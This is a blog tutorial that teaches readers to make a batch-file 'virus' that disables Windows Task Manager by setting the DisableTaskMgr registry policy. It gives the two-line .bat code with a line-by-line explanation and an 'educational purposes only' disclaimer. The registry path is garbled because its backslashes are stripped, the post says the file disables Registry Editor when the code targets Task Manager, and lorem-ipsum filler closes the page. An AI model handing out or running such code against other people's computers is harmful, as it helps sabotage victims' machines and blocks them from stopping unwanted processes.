In this tutorial I'm going to teach you how to create a Task Manager disabling virus. This virus will disable Task Manager using Registry Editor i.e. regedit.
Read this post and share it with your friends help us grow!!



In this tutorial we are going to create a virus .bat file which will disable Registry Editor, and I'll give you full explanation of the code.

So lets start,


Steps:  

  1.  Copy the following code:
@echo off
REG add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f

   2. Save it as anyname.bat 


Explanation: 

1) REG add -it used to add registry to the windows.

2) HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem :- path of the registry

3) REG_DWORD :- data type

4) 0: it is default value and means fasle. 1 stands for true.if the dword value is 0 the registry DisableTaskMgr is false and task manager will work. if the dword value is 1 the registry DisableTaskMgr is true and task managaer will be blocked.

5)So just change 0 and 1 to enable/disable the task manager.

NOTE:-This tutorial is for educational purposes only,Use at your own risk.

Tips&101Tricks is not responsible for any type of loss caused due to this information!!
Axact

Axact

Vestibulum bibendum felis sit amet dolor auctor molestie. In dignissim eget nibh id dapibus. Fusce et suscipit orci. Aliquam sit amet urna lorem. Duis eu imperdiet nunc, non imperdiet libero.

Post A Comment:

0 comments: